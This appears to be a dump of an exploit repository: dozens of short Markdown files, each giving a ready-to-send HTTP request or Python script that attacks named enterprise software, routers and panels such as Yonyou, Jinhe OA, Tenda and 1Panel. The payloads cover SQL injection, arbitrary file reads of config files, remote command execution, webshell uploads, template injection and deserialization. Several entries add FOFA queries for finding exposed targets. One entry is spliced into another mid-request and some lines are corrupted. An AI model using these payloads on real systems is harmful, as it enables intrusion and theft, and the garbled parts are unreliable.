4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
5 | ```
6 |
7 |
--------------------------------------------------------------------------------
/Tenda FH1201 v1.2.0.14接口exeCommand存在远程命令执行漏洞(CVE-2024-41468).md:
--------------------------------------------------------------------------------
1 | ```
2 | import requests
3 |
4 | ip = '192.168.74.145'
5 |
6 | url = f"http://{ip}/goform/exeCommand"
7 |
8 |
9 | data = "cmdinput=ls;"
10 | ret = requests.post(url=url,data=data)
11 | ```
12 |
13 |
--------------------------------------------------------------------------------
/网神SecSSL3600安全接入网关系统任意密码修改漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /changepass.php?type=2 HTTP/1.1
3 | host:
4 | Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}
5 |
6 | old_pass=&password=Test123!@&repassword=Test123!@
7 | ```
8 |
9 |
--------------------------------------------------------------------------------
/用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /kp/PrintZPFB.jsp?zpfbbh=1%27+union+select+1,2,3,4,db_name()+--+ HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 | Connection: close
6 | ```
7 |
8 |
--------------------------------------------------------------------------------
/金和OA jc6 clobfield SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /jc6/servlet/clobfield HTTP/1.1
3 | host:127.0.0.1
4 |
5 | key=readClob&sImgname=filename&sTablename=FC_ATTACH&sKeyname=djbh&sKeyvalue=11%27%2F**%2Fand%2F**%2FCONVERT%28int%2C%40%40version%29%3D1%2F**%2Fand%2F**%2F%27%27%3D%27
6 | ```
7 |
8 |
--------------------------------------------------------------------------------
/用友时空KSOA PreviewKPQT SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
3 | Host: x.x.x.x
4 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 | Connection: close
6 | ```
7 |
8 |
--------------------------------------------------------------------------------
/科荣AIO moffice SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /moffice?op=showWorkPlan&planId=1';WAITFOR+DELAY+'0:0:15'--&sid=1 HTTP/1.1
4 | Host: xxx
5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 | Connection: close
7 | ```
8 |
9 |
--------------------------------------------------------------------------------
/Netgear-WN604接口downloadFile.php信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /downloadFile.php?file=config HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
5 | Accept-Encoding: gzip, deflate
6 | Connection: close
7 | ```
8 |
9 |
--------------------------------------------------------------------------------
/天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 | ```
6 |
7 |
--------------------------------------------------------------------------------
/用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /kp/PrintZP.jsp?zpfbbh=1%27+IF(LEN(db_name())>4)+WAITFOR+DELAY+%270:0:2%27+--+ HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 | Connection: close
6 | ```
7 |
8 |
--------------------------------------------------------------------------------
/用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /kp/fillKP.jsp?kp_djbh=1%27+IF(LEN(db_name())>4)+WAITFOR%20DELAY%20%270:0:2%27+--+ HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 | Connection: close
6 | ```
7 |
8 |
--------------------------------------------------------------------------------
/用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /kp/PrintZPYG.jsp?zpjhid=1%27+union+select+1,2,db_name(),4,5,6,7,8,9,10,11,12,13,14+--+ HTTP/1.1
4 | Host:
5 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 | Connec
7 | ```
8 |
9 |
--------------------------------------------------------------------------------
/安恒-下一代防火墙-RCE.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix=%60id+%3E/usr/local/webui/frrgkquigh.txt%60 HTTP/1.1
3 | Host: xx.xx.xx.xx:9099
4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
5 | ```
6 |
7 |
--------------------------------------------------------------------------------
/用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /kp/PrintZPZP.jsp?zpshqid=1%27+union+select+1,2,db_name(),4,5,6,7,8,9,10,11,12,13+--+ HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 | Connection: close
6 | ```
7 |
8 |
--------------------------------------------------------------------------------
/金和OA任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /C6/JHSoft.WCF/FunctionNew/FileUploadMessage.aspx?filename=../../../C6/JhSoft.Web.Dossier.JG/JhSoft.Web.Dossier.JG/XMLFile/OracleDbConn.xml HTTP/1.1
3 | Host: 127.0.0.1
4 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
5 | Accept: */*
6 | Connection: Keep-Alive
7 | ```
8 |
9 |
--------------------------------------------------------------------------------
/宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /zh-CN/PublicInterface/DownLoadServerFile HTTP/1.1
3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 | Accept-Encoding: gzip, deflate
5 |
6 | filePath=c:\windows\win.ini
7 | ```
8 |
9 |
--------------------------------------------------------------------------------
/panabit日志审计系统sprog_upstatus存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1
3 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
4 | Accept-Encoding: gzip, deflate
5 | Accept: */*
6 | Connection: keep-alive
7 | Host:
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/喰星云·数字化餐饮服务系统not_out_depot存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /logistics/home_warning/php/not_out_depot.php?do=getList&lsid= HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 | Accept-Encoding: gzip
6 | Connection: close
7 | ```
8 |
9 |
--------------------------------------------------------------------------------
/致远AnalyticsCloud 分析云存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /.%252e/.%252e/c:/windows/win.ini HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 | Accept-Encoding: gzip, deflate
6 | Accept: */*
7 | Connection: keep-alive
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/Tenda FH1201 v1.2.0.14接口WriteFacMac存在远程命令执行漏洞(CVE-2024-41473).md:
--------------------------------------------------------------------------------
1 | ```
2 | import requests
3 |
4 | ip = '192.168.74.145'
5 |
6 | url = "http://" + ip + "/goform/WriteFacMac"
7 | payload = ";echo 'hacker!'"
8 |
9 | data = {"mac": payload}
10 | response = requests.post(url, data=data)
11 | print(response.text)
12 | ```
13 |
14 |
--------------------------------------------------------------------------------
/宏脉医疗DownLoadServerFile任意文件读取下载漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | P0ST /zh-CN/PublicInterface/DownLoadServerFile HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 | Accept-Encoding: gzip, deflate
6 |
7 | filePath=c:\windows\win.in
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/华天动力-OA-downloadWpsFile任意文件读取.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /OAapp/jsp/downloadWpsFile.jsp?fileName=../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml HTTP/2
3 | Host:
4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 | Accept-Encoding: gzip, deflate
6 | ```
7 |
8 |
--------------------------------------------------------------------------------
/证书查询系统存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /index/ajax/lang?lang=../../application/database HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 | ```
7 |
8 |
--------------------------------------------------------------------------------
/通天星 CMSV6 车载视频监控平台 disable 存在 SQL 注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+ 2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
5 | ```
6 |
7 |
--------------------------------------------------------------------------------
/福建科立讯通信 指挥调度管理平台 ajax_users.php SQL 注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /app/ext/ajax_users.php HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
5 | Content-Type: application/x-www-form-urlencoded
6 |
7 | dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/1Panel 远程代码执行漏洞(XVE-2024-17699).md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /.git/config HTTP/1.1
4 | Host:
5 | User-Agent: test',"test", "test", "", "YmxvZy5tbzYwLmNu", "test", 0, "deny", 0, 1);ATTACH DATABASE '/www/sites/test/index/test.php' AS test ;create TABLE
6 | test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES (''+>+lol.php)&type=pdf HTTP/1.1
3 | Host: 192.168.15.5
4 | Content-Length: 21
5 | User-Agent: ToxicPotato
6 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8
7 |
8 | fogguiuser=fog&nojson=2
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞(CVE-2024-2014).md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1
3 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
4 | Accept-Encoding: gzip, deflate
5 | Accept: */*
6 | Connection: keep-alive
7 | Host:
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/金万维云联应用系统接入平台RCE.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=执行的命令 HTTP/1.1
4 | Host:
5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 | Accept-Encoding: gzip, deflate
7 | Accept-Language: zh-CN,zh;q=0.9
8 | Connection: close
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/福建科立讯通信 指挥调度管理平台存在远程命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=%60echo%20test%3Etest.txt%60 HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
5 | Accept-Encoding: gzip, deflate
6 | Accept: */*
7 | Connection: keep-alive
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/科讯校园一卡通管理系统 get_kq_tj_today SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /api/get_kq_tj_today?KaID=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
4 | Host:
5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 | Accept-Encoding: gzip, deflate
7 | Accept-Language: zh-CN,zh;q=0.9
8 | Connection: close
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/赛蓝企业管理系统GetJSFile存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
5 | Accept: */*
6 | Accept-Encoding: gzip, deflate, br
7 | Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
8 | Connection: close
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=执行的命令 HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 | Accept-Encoding: gzip, deflate
6 | Accept-Language: zh-CN,zh;q=0.9
7 | Connection: close
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/用友 U8 cloud MonitorServlet 反序列化漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | java -jar ysoserial.jar CommonsCollections6 "ping dnslog.cn" > obj.ser
3 |
4 |
5 | POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1
6 | Host:
7 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
8 |
9 | payload
10 | ```
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/科讯校园一卡通管理系统 dormitoryHealthRankingSQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /api/dormitoryHealthRanking?building=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 | Accept-Encoding: gzip, deflate
6 | Accept-Language: zh-CN,zh;q=0.9
7 | Connection: close
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/天玥网络安全审计系统 SQL 注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1
3 | Host:
4 | Content-Type: application/x-www-form-urlencoded
5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 | Connection: close
7 |
8 | checkname=123&tagid=123 AND 8475=(SELECT 8475 FROM PG_SLEEP(5))-- BAUh
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /HM/M_main/InformationManage/OwnerVacantDownLoad.aspx?OwnerVacantFile=../web.config HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 | Accept-Encoding: gzip, deflate
6 | Accept-Language: zh-CN,zh;q=0.9
7 | Connection: close
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
3 | Host:
4 | User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 | Content-Type: application/x-www-form-urlencoded
6 |
7 | filename=../webapps/ROOT/WEB-INF/web.xml
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/竹云 信息泄露.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /admin-api/oauth/../admin/user/findlist
3 | Host: ip:port
4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
5 | Accept-Encoding:gzip, deflate
6 | Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
7 | Connection:close
8 | {"pagesize":改个数,"pageNumber":改个数,"userName":""}
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /HM/M_main/InformationManage/VacantDiscountDownLoad.aspx?VacantDiscountFile=../web.config HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 | Accept-Encoding: gzip, deflate
6 | Accept-Language: zh-CN,zh;q=0.9
7 | Connection: close
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/数字通云平台智慧政务 time SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=%28SELECT+4655+FROM+%28SELECT%28SLEEP%285%29%29%29usQE%29 HTTP/1.1
4 | Host:
5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 | Accept-Encoding: gzip, deflate
7 | Accept: */*
8 | Connection: keep-alive
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/SuiteCRM responseEntryPoint存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
5 | Accept-Encoding: gzip, deflate
6 | Accept: */*
7 | Connection: keep-alive
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/泛微E-Mobile installOperate.do SSRF漏洞.md:
--------------------------------------------------------------------------------
1 | FOFA:
2 |
3 | ```
4 | product="泛微-EMobile" || header="EMobileServer"
5 | ```
6 |
7 |
8 |
9 | ```
10 | GET /install/installOperate.do?svrurl=http://test.emobile.dnslog.cn HTTP/1.1
11 | Host: x.x.x.x
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
13 | Connection: close
14 | ```
15 |
16 |
--------------------------------------------------------------------------------
/1Panel面板最新前台RCE漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET / HTTP/1.1
3 | Host: 192.168.99.6
4 | User-Agent: ua', 'blog.mo60.cn', 5201314, '', '', 1, '2024-06-09 08:16:52', 1817921010.847, '/AAAAAAA', 52014, '2025-06-09', '16', '', '', 'Linux', 'edge', 'pc', '', '');ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('');#
5 | ```
6 |
7 |
--------------------------------------------------------------------------------
/方天云智慧平台系统 GetCustomerLinkman SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /WXAPI.asmx/GetCustomerLinkman HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
5 | Content-Type: application/json
6 |
7 | {clmID:"1 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- QurA"}
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
3 | Host: your-ip
4 | Accept-Encoding: gzip
5 | Content-Type: application/x-www-form-urlencoded
6 |
7 | moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/通达OA V11.10 login.php SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /ispirit/interface/login.php HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Macintosh; IntelMacOSX10_12_6)AppleWebKit/537.36(KHTML, like Gecko)Chrome/69.0.855.2 Safari/537.36
5 | Content-Type: application/x-www-form-urlencoded
6 | Content-Length: 107
7 |
8 | name=123&pass=123&_SERVER[REMOTE_ADDR]=1','10',(select+@`,'`+or+if(1%3d0,1,(select+~0%2b1))+limit+0,1))--+'
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/西软云XMS-futurehoteloperate接口存在XXE漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /XopServerRS/rest/futurehotel/operate HTTP/1.1
3 | Host: your-ip
4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.3157.54 Safari/537.36
5 | Connection: close
6 | Content-Type: text/xml
7 | Accept-Encoding: gzip
8 |
9 | %remote;]>
10 | ```
11 |
12 |
--------------------------------------------------------------------------------
/金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1WAITFOR+DELAY+%270:0:6%27--&TVersion=1 HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
5 | Connection: close
6 | Cookie: ASP.NET_SessionId=0uha1u0nhrn4meghddjiwu0y
7 | Accept-Encoding: gzip
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
3 | Host:
4 | Content-Type: application/x-www-form-urlencoded
5 |
6 | command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
7 | ```
8 |
9 | ```
10 | body="CDGServer3" || title="电子文档安全管理系统" || cert="esafenet" || body="/help/getEditionInfo.jsp" || body="/CDGServer3/index.jsp"
11 | ```
12 |
13 |
--------------------------------------------------------------------------------
/ServiceNowUI Macros CVE-2024-4879 模板注入漏洞.md:
--------------------------------------------------------------------------------
1 | icon_hash="1701804003" || title="servicenow"
2 |
3 | ```
4 | GET /login.do?jvar_page_title= HTTP/1.1
5 | Host: x.x.x.x
6 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
7 | Connection: close
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/用友-U8-Cloud-文件上传.md:
--------------------------------------------------------------------------------
1 | FOFA:app="用友-U8-Cloud"
2 |
3 | ```
4 | POST /linux/pages/upload.jsp HTTP/1.1
5 | Host: your-ip
6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
7 | Accept-Encoding: gzip, deflate
8 | Accept: */*
9 | Connection: close
10 | Content-Type: application/x-www-form-urlencoded
11 | filename: rce.jsp
12 |
13 | <% out.println("Hello,U8C");%>
14 | ```
15 |
16 | http://your-ip/linux/上传文件名.jsp
--------------------------------------------------------------------------------
/魔方网表 mailupdate.jsp 接口 任意文件上传.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /magicflu/html/mail/mailupdate.jsp?messageid=/../../../test1.jsp&messagecontent=%3C%25+out.println%28%22tteesstt1%22%29%3B%25%3E HTTP/1.1
4 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
5 | Accept-Encoding: gzip, deflate
6 | Accept: /
7 | Host:
8 | Connection: close
9 | ```
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 | ```
20 | /magicflu/test1.jsp
21 | ```
22 |
23 |
--------------------------------------------------------------------------------
/华磊科技物流modifyInsurance sql注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /modifyInsurance.htm?documentCode=1&insuranceValue=1&customerId=1+AND+6269=(SELECT+6269+FROM+PG_SLEEP(5)) HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 | Accept-Encoding: gzip, deflate, br
7 | Connection: close
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/用友U8 Cloud ActionServlet SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
4 | Host: your-ip
5 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 | Accept-Encoding: gzip
7 | Connection: close
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/汇智ERP filehandle.aspx 任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | fofa
2 |
3 | ```
4 |
5 | icon_hash="-642591392"
6 | ```
7 |
8 | POC
9 |
10 | ```
11 |
12 | GET /nssys/common/filehandle.aspx?filepath=C%3a%2fwindows%2fwin%2eini HTTP/1.1
13 | Host:
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
15 | Accept-Encoding: gzip, deflate
16 | Accept-Language: zh-CN,zh;q=0.9
17 | Connection: close
18 | ```
19 |
20 |
